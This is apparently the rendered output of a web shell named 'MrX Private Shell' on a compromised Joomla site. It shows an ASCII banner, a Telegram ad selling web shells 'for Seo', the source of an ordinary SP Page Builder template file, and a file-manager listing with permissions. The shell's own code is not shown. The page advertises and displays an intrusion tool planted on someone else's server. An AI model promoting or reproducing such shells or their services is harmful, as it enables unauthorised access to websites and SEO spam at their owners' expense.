__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2022 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct accees
defined ('_JEXEC') or die ('restricted aceess');
$addon = $displayData['addon'];
// Visibility
$custom_class = (isset($addon->settings->hidden_md) && $addon->settings->hidden_md) ? 'sppb-hidden-md sppb-hidden-lg ' : '';
$custom_class .= (isset($addon->settings->hidden_sm) && $addon->settings->hidden_sm) ? 'sppb-hidden-sm ' : '';
$custom_class .= (isset($addon->settings->hidden_xs) && $addon->settings->hidden_xs) ? 'sppb-hidden-xs ' : '';
// Animation
$addon_attr = '';
if(isset($addon->settings->global_use_animation) && $addon->settings->global_use_animation) {
if(isset($addon->settings->global_animation) && $addon->settings->global_animation) {
$custom_class .= ' sppb-wow ' . $addon->settings->global_animation . ' ';
if(isset($addon->settings->global_animationduration) && $addon->settings->global_animationduration) {
$addon_attr .= ' data-sppb-wow-duration="' . $addon->settings->global_animationduration . 'ms" ';
}
if(isset($addon->settings->global_animationdelay) && $addon->settings->global_animationdelay) {
$addon_attr .= 'data-sppb-wow-delay="' . $addon->settings->global_animationdelay . 'ms" ';
}
}
}
$html = '<div id="sppb-addon-'. $addon->id .'" class="'. $custom_class .'clearfix" '. $addon_attr .'>';
echo $html;
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| css | Folder | 0775 |
|
|
| css.php | File | 16.84 KB | 0664 |
|
| end.php | File | 322 B | 0664 |
|
| start.php | File | 1.51 KB | 0664 |
|